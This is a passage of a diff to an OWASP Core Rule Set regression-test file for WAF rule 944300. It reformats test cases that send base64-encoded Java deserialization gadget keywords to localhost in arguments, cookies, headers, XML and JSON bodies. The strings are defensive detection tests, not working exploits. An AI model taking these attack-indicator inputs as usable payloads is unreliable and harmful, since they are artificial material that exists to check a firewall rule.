"HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 